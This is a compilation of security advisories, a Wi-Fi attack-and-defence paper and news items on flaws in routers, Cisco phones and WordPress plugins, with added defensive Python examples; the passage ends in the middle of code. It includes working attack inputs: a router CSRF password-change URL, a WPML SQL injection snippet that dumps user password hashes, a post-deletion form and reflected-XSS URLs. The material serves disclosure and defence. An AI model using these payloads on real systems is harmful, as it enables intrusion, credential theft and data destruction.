Tested firmwares: 3.10L.02
Comments: Common router that Spanish ISP Telefonica used to give away to their customers
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121796 (http://osvdb.org/show/osvdb/121796)
* PoC: Although most of the input fields do not allow special characters to be written in, there are still some in which an XSS can be performed. For example, the Hostname field within the Dynamic DNS subdirectory allows script code injection.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121797 (http://osvdb.org/show/osvdb/121797)
* PoC: Every input field is vulnerable to Cross Site Request Forgery attacks. For example, if an attacker wants to change the administrator password, he may use the following URL to do so once the victim opens the link:
http://192.168.1.1/password.cgi?sysPassword=newpassword
============================================================================================
============================================================================================
Manufacturer: Comtrend
Model: 536+
Tested firmwares: A101-220TLF-C35
Comments: Common router that Spanish ISP Telefonica used to give away to their customers
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment. OSVDB-122383 (http://osvdb.org/show/osvdb/122383)
* PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has many weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or terminating any WAN connection (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (the router needs to be factory reset to work properly again) or open critical ports, even for remote hosts that are not inside the LAN.
============================================================================================ ============================================================================================ Manufacturer: D-Link Model: DIR-600 Tested firmwares: PV6K3A8024009 Comments: -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122384 (http://osvdb.org/show/osvdb/122384) * PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ We would also like to thank Alejandro Ramos (Project Tutor) and Maite Villalba (Director of Master). Greetings, Jose Antonio Rodriguez Garcia Alvaro Folgado Rueda Ivan Sanz de Castro. Source: http://dl.packetstormsecurity.net/1505-exploits/soho-22vulns.txt
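Two defensive layers for the DHCP-hostname XSS reported above (the hostname from the DHCP Request ends up on the Device Info -> DHCP leases page), as an added Python example that is not part of the advisory: the DHCP server validates the hostname option before the lease is stored, and the web UI HTML-escapes every cell when the table is rendered. The lease layout and the two sample clients are constructed.

```python
import html
import re

# RFC 1123 host label: letters, digits and hyphens, no leading or trailing
# hyphen, at most 63 characters; a full name is at most 253 characters.
# (Some real DHCP clients send underscores; tighten or relax as needed.)
_LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_hostname(name: str) -> bool:
    """True if `name` is a syntactically valid DHCP client hostname."""
    if not name or len(name) > 253:
        return False
    return all(_LABEL_RE.match(label) for label in name.split("."))


def store_lease(leases: list, mac: str, ip: str, hostname: str) -> dict:
    """Layer 1 (DHCP server side): never store a value that is not a hostname.

    The option-12 value in the DHCP Request is client-controlled; anything
    that fails validation is replaced by a neutral placeholder instead of
    being written into the leases table as received.
    """
    safe_name = hostname if is_valid_hostname(hostname) else "(invalid-hostname)"
    lease = {"mac": mac, "ip": ip, "hostname": safe_name}
    leases.append(lease)
    return lease


def render_leases_table(leases: list) -> str:
    """Layer 2 (web UI side): HTML-escape every cell at output time.

    Escaping does not depend on what layer 1 did, so a hostname that was
    stored by an older firmware without validation still cannot become markup.
    """
    rows = []
    for lease in leases:
        cells = (lease["hostname"], lease["mac"], lease["ip"])
        rows.append(
            "<tr>"
            + "".join(f"<td>{html.escape(c, quote=True)}</td>" for c in cells)
            + "</tr>"
        )
    return "<table>\n" + "\n".join(rows) + "\n</table>"


# Constructed sample clients: one normal host and one whose DHCP hostname
# option carries a script tag, the pattern the advisory describes.
SAMPLE_REQUESTS = [
    ("00:11:22:33:44:55", "192.168.1.10", "laptop-01"),
    ("66:77:88:99:aa:bb", "192.168.1.11", "<script>alert(1)</script>"),
]


def build_sample_table() -> str:
    """Run both layers over the constructed requests and return the page HTML."""
    leases: list = []
    for mac, ip, hostname in SAMPLE_REQUESTS:
        store_lease(leases, mac, ip, hostname)
    return render_leases_table(leases)


if __name__ == "__main__":
    print(build_sample_table())
```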
-
While the access points in organizations are usually under the protection of organization-wide security policies, home routers are less likely to be appropriately configured by their owners in absence of such central control. This provides a window of opportunity to neighboring Wi-Fi hackers. We talk about hacking a neighbor’s Wi-Fi since proximity to the access point is a must for wireless hacking—which is not an issue for a neighbor with an external antenna. With abundance of automated Wi-Fi hacking tools such as ‘Wifite’, it no longer takes a skilled attacker to breach Wi-Fi security. Chances are high that one of your tech-savvy neighbors would eventually exploit a poorly configured access point. The purpose may or may not be malicious; sometimes it may simply be out of curiosity. However, it is best to be aware of and secure your Wi-Fi against attacks from such parties.

Tools Used:
- Aircrack-ng Suite
- Wireshark
- Reaver
- Bully
- WiFiPhisher
- Nessus Vulnerability Scanner

Attacks Against Access Point Password

The choices of attack for a neighboring Wi-Fi hacker vary with different configurations of Wi-Fi access points. Specific Wi-Fi security standards are associated with particular security weaknesses that the attacker would target.

Open Hotspots

Although rare, open Wi-Fi access points are still extant in certain homes. When open access points are deployed in homes, it could be out of ‘generosity’ towards neighbors or sheer insouciance towards security, or both. It is observed that home users with unlimited bandwidth and data are more likely to leave their access point unsecured, unaware of the security implications.

Attack: Open Wi-Fi networks do not encrypt data packets over wireless channels. This means that anyone with a packet capture utility can read unencrypted HTTP, email, and FTP traffic. In this case, we captured the traffic pertaining to an open Wi-Fi on channel 1 using ‘Airodump-ng’, and analyzed the captured file in Wireshark, which revealed that a user on the network was logging into his (demo) bank account [Figure 1].

[Figure 1]

While it is highly unlikely today that a banking website would lack an HTTPS link, this is meant to demonstrate the dangers of using unencrypted Wi-Fi along with unencrypted protocols such as HTTP, FTP, SMTP, etc.

Defense: Never leave the access point ‘open’ or unsecured. Access the control panel of the wireless router and configure it to use a complex WPA2 key (explained later in this paper). If you insist on using an open access point, consider using ‘HTTPS Everywhere’ while browsing.

WEP IV Collisions

WEP is an outdated security standard vulnerable to statistical attacks due to IV collisions. It offers a false sense of security, and in the wake of WPA2, it is hard to think of a reason why one would want to use it.

Attack: Since WEP cracking has been covered on myriad blogs and websites already, we will refrain from going into details of attacks against it. For the intricacies of how such attacks are performed, you may visit this page.

Defense: Since the use of WEP is now deprecated due to serious security flaws, you should use WPA2 (AES) instead.

WPS Based Attacks

WPS PIN is an 8 digit number pertaining to the wireless router. It was meant to liberate users from having to remember complex WPA passwords. The idea was that since WPA is susceptible to dictionary attacks, the user would set a complex WPA passphrase and deploy WPS in order to avoid having to remember the passphrase. After supplying the correct WPS PIN to the router, it would hand over the configuration details to the client—which includes the WPA password.

Brute forcing the WPS PIN

WPS was implemented incorrectly: Firstly, the last digit of the PIN was a checksum which means the effective size of a WPS PIN is only 7 digits. Moreover, the registrar (router) checks the PIN in 2 parts. This means the first part of 4 digits would have 10,000 possible combinations, and the second part of 3 digits would have 1,000 possible combinations. Hence, the attacker would require only 11,000 attempts, in the worst case, to brute force the PIN—which is very feasible. Here, during an experiment, we were able to crack the WPS PIN in under 6 hours using the popular tool ‘reaver’ [Figure 2].

[Figure 2]

Defense: Make sure you have the latest firmware installed and that your router has a WPS lockout policy (AP rate limiting) after a certain number of unsuccessful attempts. In absence of such lockout policy, turn off WPS in your router.

Known WPS PIN

The WPS PIN attack becomes incredibly effective and short if the attacker somehow has knowledge of a neighbor’s WPS PIN.

Attack: How does the hacker (in this case a neighbor) know the WPS PIN? The PIN is usually written on the bottom of the wireless router. The (evil) neighbor could quickly glance at it during a social visit. Additionally, access points may be left ‘open’ for a certain duration while the user is implementing some router configuration changes or performing a factory reset. This offers a window of opportunity to the attacker to quickly connect to the router, access the control panel (using default credentials), and take note of the WPS PIN [Figure 3].

[Figure 3]

Once the hacker gains knowledge of the PIN, it could be used to uncover a complex WPA passphrase in seconds.

Defense: Scrub off the WPS PIN on the bottom of the wireless router, and avoid leaving your access point ‘open’ at any time. Furthermore, most updated routers will allow the owner to change the WPS PIN from the control panel [Figure 4]. Generate a new WPS PIN periodically.

[Figure 4]

Dictionary Attacks on WPA Handshakes

As long as strong, complex WPA passphrases are used to protect the access points, dictionary attacks on WPA handshakes are not really a concern. However, every once in a while a user will configure a dictionary word as the WPA password for the sake of simplicity. This leads to successful recovery of passwords from the WPA 4-way handshakes using dictionary attacks.

Attack: The attacker seeks to capture the WPA 4-way handshake between a legitimate client and the access point. A dictionary attack is used to recover the plaintext passphrase from this WPA handshake. For the intricacies of this attack, you can visit this page.

Defense: Configure complex passphrases that are a combination of special characters, numbers, letters, etc. Never use personal information such as your phone number as the WPA passphrase, as it might be guessed.

Wi-Fi Phishing

When all else fails, social engineering could always be relied upon to exploit what is often the weakest link in the chain of security—the human element. Phishing is a type of social engineering attack where the user of the Wi-Fi access point could be tricked into revealing the password.

Attack: Traditionally, such phishing attacks are carried out over emails; however, in this case even a naïve user would get suspicious if the attacker asks for a WPA password over email. Hence, the best approach is to launch an evil twin attack, make the user join the fake access point, and ask for the password. WiFiPhisher, a python tool, implements this approach. First, the tool prepares the attacker’s machine for the attack. This involves setting up the HTTP and HTTPS servers, detecting the wireless interfaces (wlan0 and wlan1), putting one of these interfaces in monitor mode, and managing DHCP services for IP address allotment [Figure 5].

[Figure 5]

The tool then detects the Wi-Fi access points in the vicinity and lists them for the attacker [Figure 6]. The attacker then specifies the access point to attack.

[Figure 6]

After the attacker chooses the access point, the tool clones the ESSID and attempts to jam the authentic access point. This is important since the attacker wants the users to get de-authenticated from the legitimate network and connect to the evil twin. If the users are not knocked off their authentic access point, or if the attacker’s evil twin access point is too far away for the users to get a strong signal from it, then the attack does not work, since no users will connect to the evil twin. This evil twin access point is now waiting for clients to connect. When a client connects, the attacker is notified that an IP address is allocated to a client. In this case, we notice that an Android device has connected to the evil twin [Figure 7].

[Figure 7]

Now, it is just a matter of time before this client attempts to access a webpage online. When the client requests a webpage, our HTTP or HTTPS server would serve the phishing page instead. For instance, here the client, the Android device, requested to connect to Google and was served the phishing page instead [Figure 8].

[Figure 8]

The attacker is notified of the client’s request for the web page and knows now that the client has been served the phishing page [Figure 9].

[Figure 9]

Moment of truth: either the user gets suspicious and closes the connection, or falls for the con and provides the WPA password as requested [Figure 8]. The user is redirected to an “upgrade-in-progress” page after he submits the WPA password [Figure 10].

[Figure 10]

Meanwhile, the password is revealed to the attacker over the console [Figure 11].

[Figure 11]

The user may end up revealing the password due to the following reasons:
- The user surmises that he is connected to his own legitimate access point.
- The phishing page is intentionally cloaked to appear as an authentic router page.
- User has a curiosity towards the open access point with the same ESSID.

Defense: Always be wary of any page asking for a password. Avoid giving out the WPA password over shady pages.

Aftermath: The Hacker is in

Once the attacker has obtained the password and is connected to the access point, he would attempt to explore further. The first point of interest is the router’s control panel.

Default credentials: A surprising number of home users do not change the default credentials to their router’s management panel. Router default credentials can be obtained on the Internet, and subsequent access to this management console grants the hacker further privileges on the network.

Digging PIN and passwords: Once inside the Wi-Fi management panel, the hacker would note down the WPS PIN and any hidden password for future use. “Hidden” passwords behind asterisks are easy to uncover. For instance, we uncover the ‘admin’ and ‘user’ passwords germane to a router using ‘Inspect element’ in Chrome [Figure 12].

[Figure 12]

Exploiting clients: Since the attacker is now a part of the local network, he can initiate local scans to glean details of clients, services, ports etc. This allows the attacker to target vulnerabilities pertaining to clients connected to the network [Figure 13].

[Figure 13]

DNS Manipulation: If the attacker has secured access to the router’s control panel, he can modify the DNS configuration which has severe implications on security. For example, the attacker could plant a fake DNS entry to redirect clients using an online banking service to a rogue server serving phishing pages.

Maintaining Access: A persistent neighboring hacker requiring prolonged access to the Wi-Fi access point would want to ensure continued access even after the current password or security protocol is modified later by the owner. Accordingly, the hacker would access the router control panel and take note of the WPS PIN [Figure 4]. More advanced attackers would try to plant a backdoor in the router firmware, such as a master password, that would allow them to access the Wi-Fi at will in the future. However, this involves flashing custom firmware, such as DD-WRT, to the router. DD-WRT provides open source router firmware for numerous wireless router models. The attacker would download the appropriate DD-WRT firmware, modify the source code to include a master password or backdoor, and flash this firmware to the router using the router control panel DDW1 [Figure 14].

[Figure 14]

Conclusion

The purpose of this paper is not to condone hacking your neighbors’ Wi-Fi, rather to apprise owners of common security weaknesses in Wi-Fi configurations and suggest relevant mitigation. “Since I have unlimited data and bandwidth, I do not mind if an unknown person is using my Wi-Fi.” While this generosity is worthy of some appreciation, bandwidth and data usage are not the only concerns when your Wi-Fi is accessed by an unauthorized party. Consider the case where a neighbor attempted to indict the owners after cracking their WEP key and accessing child pornography websites. Since it is your network, the ISP and authorities turn to you while investigating illicit activities. Router manufacturers provide GUI control panels that make it easy for owners to configure their access points. It is best to utilize these interfaces for secure configuration of access points that are capable of thwarting attacks from neighbors.

References
[1] DD-WRT. DD-WRT. [Online]. Development - DD-WRT Wiki
[2] Nikita Borisov, Ian Goldberg, and David Wagner. isaac.cs.berkeley.edu. [Online]. (In)Security of the WEP algorithm
[3] Sean Gallagher. (2014, January) ArsTechnica. [Online]. Backdoor in wireless DSL routers lets attacker reset router, get admin | Ars Technica

Source
-
A Quantum Insert Attack is a classic example of man-in-the-middle attacks which resurfaced into news among the top 10 biggest leaks by WikiLeaks founder Edward Snowden. The NSA and Britain’s GCHQ intelligence services allegedly used it against OPEC and Belgacom successfully for their benefit. In short – Quantum is a code name for the servers which are strategically placed by NSA and GCHQ that can respond faster to a request than the intended recipient. The attacker would need monitoring capabilities to successfully attack the victim. Once the quantum servers win the race condition against the original response, the attacker can steal sensitive data like login credentials, bank account details, and credit card numbers or even spread a malware which can work in tandem with a botnet C&C server.

Understanding the attack

The attack begins with the attacker gaining monitoring capabilities into the victim’s network. In a government sponsored attack, the monitoring capabilities can be gained by Internet Service Providers and in the case of cyber espionage crimes, having access within a network looking to move laterally inside. This kind of attack is generally not used for large scale attacks, instead the attacker is very well aware of his target and most frequently used websites. In the past, Snowden leaks revealed that LinkedIn and Slashdot users have been targeted for attacks. The crux of the attack is in winning the race condition against the legitimate response packets. The schematic diagram here will help you understand better:

[Schematic diagram: Step 1, Step 2, Step 3]

In the above schematic diagram, we see that the attacker waits on the network for the target to initiate a connection with a particular website. Each quantum server is configured so that certain conditions are met. Once any request from the target fulfills this set of conditions, the attacker is notified of the request from the target. The quantum servers then shoot a response to the original request by the victim. The victim receives the malicious payload, and the attacker can have full control of the victim. The original response packets from the website are discarded.

Simulating the attack

To simulate the Quantum Insert attack, we would require three VMs:
- One VM will act as a victim
- Second VM will be used to monitor the traffic
- Third will be used to shoot a malicious payload to the victim.

The proof-of-concept code for simulation is available to be downloaded here: Download

Though the details of use for the script are given in the github page, let me re-iterate them here for quick reference. The attacker knows that the victim frequents mysite.com and configures his monitor.py to notify the shooter on matching certain conditions. In our case the conditions are as follows:
- Victim visits mysite.com
- We need SYN+ACK of mysite.com

On getting this information via tcpdump (whose output is parsed by monitor.py) the shooter is notified. Shooter has a dependency on Scapy to craft packets (with its header details, but a different payload) to be sent to the victim. The only challenge here is to have a privileged position in the Internet backbone, to win the race condition.

How real time QI works

I. Foot printing

Agencies like NSA and GCHQ catch hold of choke point in the Internet backbone, and try to catch hold of the identity of the users from the organization that is being targeted. The project codenamed as TURMOIL captures the network dumps and passes it to traffic analysis tools like Xkeyscore which automate the packet analysis.

II. Build User Profiles

Tools like Xkeyscore can be used to search for patterns in the network traffic which help in identifying multiple points of attacks. The kinds of data which are captured include web histories, email traffic, chat logs etc. It seems that in a particular case of QI attacks on OPEC, this phase went on for several years.

III. Attack the target

Once the attack points are profiled, the monitor at the choke point of the Internet backbone notifies the shooter when any requests fulfilling all the conditions are met. In the case of the Belgacom hack, GCHQ used QI attack to route the traffic for LinkedIn and Slashdot to malicious servers posing as those sites.

IV. Maintain access and persist

Once the attack is successful, it’s the same old mundane post exploitation tasks where the attacker tries to escalate privileges and laterally move within the network in stealth mode to gain his hands on sensitive data and other network resources like mail servers, file servers etc., which are then exfiltrated to data analysis experts.

Detecting QI attacks

QI attacks work by spoofing the packets in response to a request to a particular website. One packet in response to a GET request from the victim contains content for the real website, and another packet will contain content for the malicious website. But, both of these packets are bound to have the same sequence numbers, which is a giveaway while detecting QI attacks. Another anomaly to be noticed is the TTL value of the packet. The spoofed packets would contain a significant difference in the TTL values than the real packets because of the closer proximity of the attacker to the victim.

Links for QI detection for snort: GitHub
Links for QI PCAPS: GitHub

References
http://blog.fox-it.com

Source
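The two detection indicators named in the post (the same sequence number carrying different payloads, and a TTL that differs from the rest of the flow), as an added Python example that is not the Snort rules or GitHub code the post links to: it runs over a small constructed capture of one server-to-client HTTP flow. The segment fields, addresses and the TTL threshold are assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass
from statistics import median


@dataclass(frozen=True)
class TcpSegment:
    """Minimal view of a captured TCP segment (constructed, not a Scapy packet)."""
    src: str
    sport: int
    dst: str
    dport: int
    seq: int
    ttl: int
    payload: bytes


def detect_quantum_insert(segments, ttl_threshold: int = 5) -> list:
    """Return one alert dict per anomaly found in `segments`.

    Two indicators from the write-up are checked per server->client flow:
      1. two data segments with the same sequence number but different
         payloads (a genuine retransmission repeats the same bytes);
      2. a TTL at least `ttl_threshold` hops away from the flow's typical
         TTL, because the injecting host sits elsewhere on the path than
         the real server.
    """
    alerts = []
    flows = defaultdict(list)
    for seg in segments:
        flows[(seg.src, seg.sport, seg.dst, seg.dport)].append(seg)

    for flow, segs in flows.items():
        # Indicator 1: same seq, different payload.
        by_seq = defaultdict(list)
        for seg in segs:
            if seg.payload:                      # pure ACKs carry nothing to compare
                by_seq[seg.seq].append(seg)
        for seq, dups in by_seq.items():
            if len({d.payload for d in dups}) > 1:
                alerts.append({
                    "flow": flow,
                    "reason": "same seq, different payload",
                    "seq": seq,
                    "ttls": sorted(d.ttl for d in dups),
                })

        # Indicator 2: TTL outlier relative to the flow baseline. The median
        # is used so a single injected segment cannot pull the baseline
        # toward itself; three segments is the minimum for a usable baseline.
        if len(segs) >= 3:
            baseline = median(seg.ttl for seg in segs)
            for seg in segs:
                if abs(seg.ttl - baseline) >= ttl_threshold:
                    alerts.append({
                        "flow": flow,
                        "reason": "ttl deviates from flow baseline",
                        "seq": seg.seq,
                        "ttl": seg.ttl,
                        "baseline": baseline,
                    })
    return alerts


# Constructed capture: the real server for mysite.com answers with TTL 52.
# One injected segment reuses the first data segment's sequence number with
# a different body and arrives with TTL 60; the last segment is an honest
# retransmission (same seq, same bytes) and must not trigger an alert.
SERVER, CLIENT = "203.0.113.10", "192.0.2.25"
SAMPLE_CAPTURE = [
    TcpSegment(SERVER, 80, CLIENT, 51000, 1000, 52, b"HTTP/1.1 200 OK\r\n"),
    TcpSegment(SERVER, 80, CLIENT, 51000, 1000, 60, b"HTTP/1.1 200 OK\r\n(injected body)"),
    TcpSegment(SERVER, 80, CLIENT, 51000, 1017, 52, b"Content-Type: text/html\r\n"),
    TcpSegment(SERVER, 80, CLIENT, 51000, 1042, 52, b"\r\n<html>...</html>"),
    TcpSegment(SERVER, 80, CLIENT, 51000, 1042, 52, b"\r\n<html>...</html>"),
]


if __name__ == "__main__":
    for alert in detect_quantum_insert(SAMPLE_CAPTURE):
        print(alert)
```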
-
Some of the IP phones designed by Cisco for small businesses are plagued by a vulnerability that allows a remote attacker to eavesdrop on conversations and make phone calls from affected devices, the company revealed last week.

The unauthenticated remote dial vulnerability (CVE-2015-0670) affects version 7.5.5 and possibly later versions of Cisco Small Business SPA300 and SPA500 series IP phones.

According to an advisory published by Cisco, the flaw is caused by improper authentication settings in the affected software’s default configuration. A remote, unauthenticated attacker can exploit the weakness by sending a maliciously crafted XML request to the targeted IP phone. Malicious actors could obtain sensitive information by listening in on audio streams from the device. They can also leverage the bug to make phone calls remotely from a vulnerable phone.

“A successful exploit could be used to conduct further attacks,” Cisco said.

“To exploit this vulnerability, an attacker may need access to trusted, internal networks behind a firewall to send crafted XML requests to the targeted device. This access requirement may reduce the likelihood of a successful exploit,” the company noted in its advisory.

Cisco has confirmed the security hole, but updates that address this issue are not yet available. The company believes it’s unlikely for this medium severity vulnerability to be exploited. Until security updates become available, administrators are advised to enable XML execution authentication from the device’s settings menu, and limit network access to trusted users.

The security hole was discovered by Chris Watts of Tech Analysis. In July 2014, the researcher reported two other flaws impacting Cisco SPA300 and SPA500 series IP phones: a cross-site scripting (XSS) vulnerability (CVE-2014-3313), and a vulnerability that can be exploited by a local attacker to execute arbitrary commands (CVE-2014-3312). At around the same time, Watts also identified a remote code execution flaw in Cisco modems.

Earlier this month, Cisco announced the availability of security updates that fix vulnerabilities in Cisco Intrusion Prevention System (IPS), TelePresence Video Communication Server (VCS), Expressway, and TelePresence Conductor.

Source
-
OVERVIEW
==========

WPML is the industry standard for creating multi-lingual WordPress sites. Three vulnerabilities were found in the plug-in. The most serious of them, an SQL injection problem, allows anyone to read the contents of the WordPress database, including user details and password hashes, without authentication. System administrators should update to version 3.1.9.1 released earlier this week to resolve the issues.

DETAILS
========

1. SQL injection

When WPML processed a HTTP POST request containing the parameter "action=wp-link-ajax", the current language is determined by parsing the HTTP referer. The parsed language code is not checked for validity, nor SQL-escaped. The user doesn’t need to be logged in. By sending a carefully crafted referer value with the mentioned POST request parameter, an attacker can perform SQL queries on arbitrary tables and retrieve their results. In addition to the standard WordPress database and tables, the attacker may query all other databases and tables accessible to the web backend.

The following HTML snippet demonstrates the vulnerability:

<script>
var union="select user_login,1,user_email,2,3,4,5,6,user_pass,7,8,9,10,11,12 from wp_users";
if (document.location.search.length < 2)
  document.location.search="lang=xx' UNION "+union+" -- -- ";
</script>
<form method=POST action="https://YOUR.WORDPRESS.BLOG/comments/feed">
<input type=hidden name=action value="wp-link-ajax">
<input type=submit>
</form>

The results of the SQL query will be shown in the comments feed XML-formatted.

2. Page/post/menu deletion

WPML contains a "menu sync" function which helps site administrators to keep WordPress menus consistent across different languages. This functionality lacked any access control, allowing anyone to delete practically all content of the website - posts, pages, and menus.

Example:

<form method=POST action="https://YOUR.WORDPRESS.BLOG/?page=sitepress-multilingual-cms/menu/menus-sync.php">
<input type=hidden name="action" value="icl_msync_confirm">
<input type=text name="sync" size=50 value="del[x][y][12345]=z">
<input type=submit>
</form>

Submitting the above form would delete the row with the ID 12345 in the wp_posts database. Several items can be deleted with the same request.

3. Reflected XSS

The "reminder popup" code intended for administrators in WPML didn’t check for login status or nonce. An attacker can direct target users to an URL like:

https://YOUR.WORDPRESS.BLOG/?icl_action=reminder_popup&target=javascript%3Aalert%28%2Fhello+world%2f%29%3b%2f%2f

to execute JavaScript in their browser. This example bypasses the Chrome XSS Auditor. In the case of WordPress, XSS triggered by an administrator can lead to server-side compromise via the plugin and theme editors.

CREDITS
========

The vulnerabilities were found by Jouko Pynnonen of Klikki Oy while researching WordPress plugins falling in the scope of the Facebook bug bounty program. The vendor was notified on March 02, 2015 and the patch was released on March 10.

Vendor advisory: http://wpml.org/2015/03/wpml-security-update-bug-and-fix/

An up-to-date version of this document can be found on our website http://klikki.fi .

-- 
Jouko Pynnönen <jouko@iki.fi>
Klikki Oy - http://klikki.fi

Source
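The language-code handling behind item 1, as an added Python example that is not WPML's code: the lang value parsed from the Referer is shown unchecked (the pattern the advisory describes) beside a version that restricts it to the site's configured languages and passes it to the database as a bound parameter. The table names, their contents and the allowed-language set are constructed stand-ins.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlparse

# Languages this (constructed) site is configured with; WPML keeps the real
# list in its own tables, the set here stands in for that.
ALLOWED_LANGS = {"en", "fi", "de"}
# Shape of a language code: two lowercase letters, optional region suffix.
_LANG_RE = re.compile(r"^[a-z]{2}(-[a-z]{2,4})?$")


def lang_from_referer_vulnerable(referer: str, default: str = "en") -> str:
    """The defect as described: the lang= value from the Referer query string
    is returned exactly as received, with no validity check."""
    query = parse_qs(urlparse(referer).query)
    return query.get("lang", [default])[0]


def lang_from_referer_hardened(referer: str, default: str = "en") -> str:
    """Same parsing, but the value must both look like a language code and be
    one of the configured languages; anything else falls back to the default."""
    query = parse_qs(urlparse(referer).query)
    lang = query.get("lang", [default])[0]
    if _LANG_RE.match(lang) and lang in ALLOWED_LANGS:
        return lang
    return default


def open_sample_db() -> sqlite3.Connection:
    """In-memory stand-in for the WordPress/WPML tables (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE wp_users (user_login TEXT, user_email TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES ('admin', 'admin@example.invalid', '$P$B-constructed-hash');
        CREATE TABLE icl_languages (code TEXT, english_name TEXT);
        INSERT INTO icl_languages VALUES ('en', 'English'), ('fi', 'Finnish'), ('de', 'German');
        """
    )
    return conn


def language_name_vulnerable(conn: sqlite3.Connection, lang: str) -> list:
    """'Before': the language code is concatenated into the SQL text, so a
    quote inside it ends the literal and the remainder runs as SQL."""
    sql = f"SELECT english_name FROM icl_languages WHERE code = '{lang}'"
    return [row[0] for row in conn.execute(sql)]


def language_name_hardened(conn: sqlite3.Connection, lang: str) -> list:
    """'After': bound parameter, so the value is only ever compared as data."""
    sql = "SELECT english_name FROM icl_languages WHERE code = ?"
    return [row[0] for row in conn.execute(sql, (lang,))]


def handle_wp_link_ajax(conn: sqlite3.Connection, referer: str) -> list:
    """Hardened request path for the action=wp-link-ajax case: validate the
    language first, then query with a bound parameter."""
    return language_name_hardened(conn, lang_from_referer_hardened(referer))


if __name__ == "__main__":
    db = open_sample_db()
    print(handle_wp_link_ajax(db, "https://blog.example/?lang=fi"))
    print(handle_wp_link_ajax(db, "https://blog.example/?lang=xx' UNION select 1 -- --"))
```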
-
More than one million websites that run on the WordPress content management application run the risk of being completely hijacked by attackers exploiting critical vulnerability in most versions of a plugin called WP-Slimstat.

Versions prior to the recently released Slimstat 3.9.6 contain a readily guessable key that's used to sign data sent to and from visiting end-user computers, according to a blog post published Tuesday by Web security firm Sucuri. The result is a SQL injection vector that can be used to extract highly sensitive data, including encrypted passwords and the encryption keys used to remotely administer websites.

"If your website uses a vulnerable version of the plugin, you’re at risk," Marc-Alexandre Montpas, a senior vulnerability researcher at Sucuri, wrote. "Successful exploitation of this bug could lead to Blind SQL Injection attacks, which means an attacker could grab sensitive information from your database, including username, (hashed) passwords and, in certain configurations, WordPress Secret Keys (which could result in a total site takeover)."

The WP-Slimstat secret key is nothing more than the MD5 hash of the plugin’s installation timestamp. An attacker could use the Internet Archive or similar sites to determine the year a vulnerable site was put online. That would leave an attacker with about 30 million values to test, an undertaking that could be completed in about 10 minutes. Once the secret key has been divined, the attacker can use it to pull data out of the database.

WP-Slimstat is an analytics tool. Its listing on WordPress shows it has been downloaded more than 1.3 million times. People who operate websites that use the plugin should update immediately.

Post updated to change headline. It previously read: More than 1 million WordPress websites imperiled by critical plugin bug.

Source
-
WordPress has become a huge target for attackers and vulnerability researchers, and with good reason. The software runs a large fraction of the sites on the Internet and serious vulnerabilities in the platform have not been hard to come by lately. But there’s now a new bug that’s been disclosed in all versions of WordPress that may allow an attacker to take over vulnerable sites.

The issue lies in the fact that WordPress doesn’t contain a cryptographically secure pseudorandom number generator. A researcher named Scott Arciszewski made the WordPress maintainers aware of the problem nearly eight months ago and said that he has had very little response.

“On June 25, 2014 I opened a ticket on WordPress’s issue tracker to expose a cryptographically secure pseudorandom number generator, since none was present,” he said in an advisory on Full Disclosure. “For the past 8 months, I have tried repeatedly to raise awareness of this bug, even going as far as to attend WordCamp Orlando to troll^H advocate for its examination in person. And they blew me off every time.”

The consequences of an attack on the bug would be that the attacker might be able to predict the token used to generate a new password for a user’s account and thus take over the account. Arciszewski has developed a patch for the problem and published it, but it has not been integrated into WordPress. Since the public disclosure, he said he has had almost no communication from the WordPress maintainers about the vulnerability, save for one tweet from a lead developer that was later deleted.

Arciszewski said he has not developed an exploit for the issue but said that an attacker would need to be able to predict the next RNG seed in order to exploit it.

“There is a rule in security: attacks only get better, never worse. If this is not attackable today, there is no guarantee this will hold true in 5 or 10 years.
Using /dev/urandom (which is what my proposed patch tries to do, although Stefan Esser has highlighted some flaws that would require a 4th version before it’s acceptable for merging) is a serious gain over a userland RNG,” he said by email.

But, as he pointed out, this kind of bug could have a lot of value for a lot of attackers.

“WordPress runs over 20% of websites on the Internet. If I were an intelligence agency (NSA, GCHQ, KGB, et al.) I would have a significant interest in hard-to-exploit critical WordPress bugs, since the likelihood of a high-value target running it as a platform is pretty significant. That’s not to say or imply that they knew about this flaw! But if they did, they probably would have sat on it forever,” Arciszewski said.

WordPress officials did not respond to questions for this story before publication.

Source
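The two key-generation weaknesses in the WP-Slimstat and WordPress items above, as an added Python example that is not either project's code: a secret derived deterministically from an installation timestamp (with the roughly 30-million-per-year search space the Slimstat post cites), a password-reset token drawn from a seeded userland RNG, and the OS-CSPRNG replacements for both, with an HMAC sign/verify using the strong key. The timestamp, seed and message contents are constructed.

```python
import hashlib
import hmac
import math
import random
import secrets
import string

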